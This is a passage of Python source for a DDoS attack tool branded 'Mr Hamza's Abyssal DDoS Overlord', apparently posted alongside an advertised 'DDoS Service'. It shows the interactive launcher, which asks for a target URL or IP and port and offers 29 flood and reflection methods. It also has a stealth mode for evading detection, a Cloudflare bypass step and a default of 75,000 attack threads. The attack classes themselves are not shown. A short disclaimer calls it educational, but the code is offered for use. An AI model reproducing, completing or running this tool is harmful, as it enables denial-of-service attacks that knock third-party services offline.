os.system(‘cls’ if os.name == ‘nt’ else ‘clear’)
print(‘=’ * 260)
print(f”{Fore.CYAN}{r’ ____ _ _ ____ _ _ ____ ____ _ _ ____ ‘.center(260)}{Style.RESET_ALL}”)
print(f”{Fore.CYAN}{r’ (_ _)( )_( )( ___)( \/ )( _ \( _ \( \( )( _ \ ‘.center(260)}{Style.RESET_ALL}”)
print(f”{Fore.CYAN}{r’ )( ) _ ( )__) ) ( )___/ ) _ ( ) ( ) / ‘.center(260)}{Style.RESET_ALL}”)
print(f”{Fore.CYAN}{r’ (__) (_) (_)(____)(_/\_)(__) (____/(_)\_)(__\_) ‘.center(260)}{Style.RESET_ALL}”)
print(f”{Fore.MAGENTA}Mr Hamza’s Abyssal DDoS Overlord – v9.1{Style.RESET_ALL}”.center(260))
print(f”{Fore.MAGENTA}Coded by Mr Hamza | Telegram: @mrhamzaofficiel{Style.RESET_ALL}”.center(260))
print(“Methods: 29 Advanced Techniques including QUIC Reflection & ICMP Flood”.center(260))
print(“Features: Dynamic Protocol Switching, Geo-Distributed Simulation, Advanced Rate Limit Evasion, Stealth Mode”.center(260))
print(“Use responsibly on systems you own or have permission to test—Unauthorized use is forbidden!”.center(260))
print(f”Current Date and Time: 02:44 PM CEST, Wednesday, May 28, 2025″.center(260))
print(“WARNING: This tool is for educational purposes only. Misuse will lead to severe legal consequences!”.center(260))
print(‘=’ * 260)
def start_url():
global TARGET_URL, TARGET_IP, PORT
logo()
TARGET_URL = input(f”\n{Fore.CYAN}[*] Target [URL/IP]: {Style.RESET_ALL}”).strip()
if not TARGET_URL:
start_url()
try:
if TARGET_URL.startswith((“www.”, “http”)):
if TARGET_URL.startswith(“www.”):
TARGET_URL = “http://” + TARGET_URL
elif not TARGET_URL.startswith((“http://”, “https://”)):
TARGET_URL = “http://” + TARGET_URL
else:
TARGET_URL = “http://” + TARGET_URL
except:
print(f”{Fore.RED}[!] You Mistyped, Try Again [!]{Style.RESET_ALL}”)
start_url()
logo()
try:
TARGET_IP = socket.gethostbyname(TARGET_URL.replace(“http://”, “”).replace(“https://”, “”).split(“/”)[0].split(“:”)[0])
except socket.gaierror:
print(f”{Fore.RED}[!] Invalid Target: Unable to resolve IP address.{Style.RESET_ALL}”)
time.sleep(4)
start_url()
except Exception as e:
print(f”{Fore.RED}[!] Error Resolving Target: {e}{Style.RESET_ALL}”)
time.sleep(4)
start_url()
if any(black in TARGET_IP or black in TARGET_URL for black in BLACKLIST):
print(f”\n{Fore.RED}[X] ERROR: Site In Blacklist{Style.RESET_ALL}”)
time.sleep(4)
TARGET_URL = “”
TARGET_IP = “”
start_url()
start_port()
logo()
start_mode()
def start_port():
global PORT
print(“—————————–“)
port_input = input(f”{Fore.CYAN}[*] Port [80]: {Style.RESET_ALL}”)
if not port_input:
if “https” in TARGET_URL:
PORT = 443
print(f”{Fore.GREEN}[!] Selected Port = 443 [!]{Style.RESET_ALL}”)
else:
PORT = 80
print(f”{Fore.GREEN}[!] Selected Port = 80 [!]{Style.RESET_ALL}”)
else:
try:
PORT = int(port_input)
if PORT < 1 or PORT > 65535:
raise ValueError(“Port out of range”)
except ValueError:
print(f”{Fore.RED}[!] Invalid Port, Defaulting to 80 [!]{Style.RESET_ALL}”)
PORT = 80
def start_mode():
global choice_mode, method_pass_cf
print(f”{Fore.CYAN}r\”\”\”\n[+]=====[ Layer 7 ]=====[+]=======[ Layer 4 ]=======[+]\n # 0: Home [ HOME ] # 13: HTTP/3 Flood [ DDos ] #\n # 1: Proxy [ DDoS ] # 14: Slowloris Eternal [Home] #\n # 2: Socks [ DDoS ] # 15: RUDY Amplification[DDos] #\n # 3: JS-Normal [ Home ] # 16: WebSocket Overload [DDos] #\n # 4: Raw-DoS [ Home ] # 17: QUIC Reflection [ DDos ] #\n # 5: UDP Flood [ DDos ] # 18: HTTP/2 Frame Flood [DDos] #\n # 6: TCP-SYN Flood [ DDos ] # 19: DNS Query Storm [ DDos ] #\n # 7: GRE Tunnel [ DDos ] # 20: NTP Reflection [ DDos ] #\n # 8: ICMP Flood [ DDos ] # 21: ARP Spoofing Flood [DDos] #\n # 9: WebRTC Flood [ DDos ] # 22: SMB Ghost Flood [ DDos ] #\n #10: IP Fragmentation [DDos] # 23: HTTP Pipeline Overload [DDos] #\n #11: SSDP Amplification [DDos] # 24: SIP Flood [ DDos ] #\n #12: TCP Reset Storm [ DDos ] # 25: IGMP Amplification [ DDos ] #\n[+]=========================[ Advanced Modes ]========================[+]\n # 26: Hybrid Swarm Assault [DDos] # (Combines multiple methods dynamically)\n # 27: Geo-Distributed Flood [DDos] # (Simulates global attack nodes)\n # 28: QUIC Reflection Attack [DDos] # (QUIC protocol reflection)\n # 29: ICMP Flood [DDos] # (ICMP ping flood)\n—————————————————\n[*] Choose Your Method [0-29]: {Style.RESET_ALL}\”\”\””)
choice_mode_input = input()
if not choice_mode_input:
choice_mode_input = “0”
try:
choice_mode = int(choice_mode_input)
if choice_mode not in range(30):
print(f”{Fore.RED}[!] Invalid Choice, Defaulting to 0 [!]{Style.RESET_ALL}”)
choice_mode = 0
except ValueError:
print(f”{Fore.RED}[!] Invalid Input, Defaulting to 0 [!]{Style.RESET_ALL}”)
choice_mode = 0
logo()
if choice_mode in [0, 3, 4, 14]:
method_pass_cf = “1”
else:
method_pass_cf = “0”
stealth_mode()
def stealth_mode():
global STEALTH_MODE
print(“—————————–“)
stealth_input = input(f”{Fore.CYAN}[*] Enable Stealth Mode? (y/n) [n]: {Style.RESET_ALL}”)
if stealth_input.lower() in [‘y’, ‘yes’]:
STEALTH_MODE = True
with lock:
stats[“stealth_enabled”] = True
print(f”{Fore.GREEN}[!] Stealth Mode Enabled – Reduced Detectability [!]{Style.RESET_ALL}”)
else:
STEALTH_MODE = False
with lock:
stats[“stealth_enabled”] = False
print(f”{Fore.GREEN}[!] Stealth Mode Disabled [!]{Style.RESET_ALL}”)
logo()
choice_method_attack()
def choice_method_attack():
global method_attack, name_method_attack
if method_pass_cf == “1”:
print(“—————————–“)
print(f”{Fore.CYAN}[*] Method Attack [1-2]:{Style.RESET_ALL}”)
print(” # 1: Normal”)
print(” # 2: Raw-DoS”)
method_attack = input()
if not method_attack:
method_attack = “1”
try:
method_attack = int(method_attack)
if method_attack not in [1, 2]:
print(f”{Fore.RED}[!] Invalid Choice, Defaulting to 1 [!]{Style.RESET_ALL}”)
method_attack = 1
except ValueError:
print(f”{Fore.RED}[!] Invalid Input, Defaulting to 1 [!]{Style.RESET_ALL}”)
method_attack = 1
if method_attack == 1:
name_method_attack = “Normal”
else:
name_method_attack = “Raw-DoS”
logo()
numthreads()
def numthreads():
global BASE_THREAD_COUNT
print(“—————————–“)
thread_input = input(f”{Fore.CYAN}[*] Threads [75000]: {Style.RESET_ALL}”)
if not thread_input:
BASE_THREAD_COUNT = 75000
print(f”{Fore.GREEN}[!] Selected Threads = 75000 [!]{Style.RESET_ALL}”)
else:
try:
BASE_THREAD_COUNT = int(thread_input)
if BASE_THREAD_COUNT < 3000 or BASE_THREAD_COUNT > MAX_THREADS:
print(f”{Fore.RED}[!] Threads out of range (3000-{MAX_THREADS}), Defaulting to 75000 [!]{Style.RESET_ALL}”)
BASE_THREAD_COUNT = 75000
except ValueError:
print(f”{Fore.RED}[!] Invalid Input, Defaulting to 75000 [!]{Style.RESET_ALL}”)
BASE_THREAD_COUNT = 75000
logo()
start()
def start():
global stats, cookie, user
logo()
print(“—————————–“)
if method_pass_cf == “1” and AIOHTTP_AVAILABLE:
loop = asyncio.get_event_loop()
result = loop.run_until_complete(bypass_cloudflare(TARGET_URL))
cookie = result[“cookie”]
user = result[“user-agent”]
if not cookie:
print(f”{Fore.YELLOW}[!] Cloudflare Bypass Failed, Proceeding Without Cookie{Style.RESET_ALL}”)
with lock:
stats[“start_time”] = time.time()
stats[“attack_method”] = [
“Home”, “Proxy”, “Socks”, “JS-Normal”, “Raw-DoS”, “UDP Flood”, “SYN Flood”, “GRE Tunnel”, “ICMP Flood”,
“WebRTC Flood”, “IP Fragmentation”, “SSDP Amplification”, “TCP Reset Storm”, “HTTP/3 Flood”, “Slowloris Eternal”,
“RUDY Amplification”, “WebSocket Overload”, “QUIC Reflection”, “HTTP/2 Frame Flood”, “DNS Query Storm”,
“NTP Reflection”, “ARP Spoofing Flood”, “SMB Ghost Flood”, “HTTP Pipeline Overload”, “SIP Flood”,
“IGMP Amplification”, “Hybrid Swarm Assault”, “Geo-Distributed Flood”, “QUIC Reflection Attack”, “ICMP Flood”
][choice_mode]
print(f”{Fore.GREEN}[+] Attack Started on {TARGET_IP}:{PORT} with Method: {stats[‘attack_method’]} [{name_method_attack}] [!]{Style.RESET_ALL}”)
logging.info(f”Attack started: Target={TARGET_IP}:{PORT}, Method={stats[‘attack_method’]}, Threads={BASE_THREAD_COUNT}, Stealth={stats[‘stealth_enabled’]}”)
threading.Thread(target=display_gui, daemon=True).start()
launch_attack()
def launch_attack():
threads: List[threading.Thread] = []
attack_classes = [Home, SSDPAmplification, GeoDistributedFlood, HybridSwarmAssault, QUICReflectionAttack, ICMPFlood]
if choice_mode == 27:
selected_classes = [GeoDistributedFlood]
elif choice_mode == 26:
selected_classes = random.sample(attack_classes, k=min(4, len(attack_classes)))
elif choice_mode == 28:
selected_classes = [QUICReflectionAttack]
elif choice_mode == 29:
selected_classes = [ICMPFlood]
else:
selected_classes = [attack_classes[choice_mode] if choice_mode < len(attack_classes) else Home]
for i in range(BASE_THREAD_COUNT):
thread_class = random.choice(selected_classes) if choice_mode in [26, 27] else selected_classes[0]
thread = thread_class(i)
threads.append(thread)
thread.start()
if i % 4000 == 0:
time.sleep(0.008)
for thread in threads:
thread.join()
stop_event.set()
print(f”{Fore.RED}[-] Attack Completed on {TARGET_IP}:{PORT} [!]{Style.RESET_ALL}”)
logging.info(f”Attack completed: Target={TARGET_IP}:{PORT}, Total Requests={stats[‘total_requests’]}, Stealth={stats[‘stealth_enabled’]}”)
if __name__ == “__main__”:
try:
start_url()
except KeyboardInterrupt:
print(f”\n{Fore.RED}[-] Attack Interrupted by User [!]{Style.RESET_ALL}”)
stop_event.set()
logging.info(“Attack interrupted by user”)
except Exception as e:
print(f”{Fore.RED}[-] Fatal Error: {e} [!]{Style.RESET_ALL}”)
logging.error(f”Fatal error: {str(e)}”)
with lock:
stats[“error_count”] += 1
finally:
print(f”{Fore.YELLOW}[!] Cleaning up resources…{Style.RESET_ALL}”)
if CRYPTO_AVAILABLE:
gc.collect()
Mr.Hamza DDoS Service
Pages: 1 2
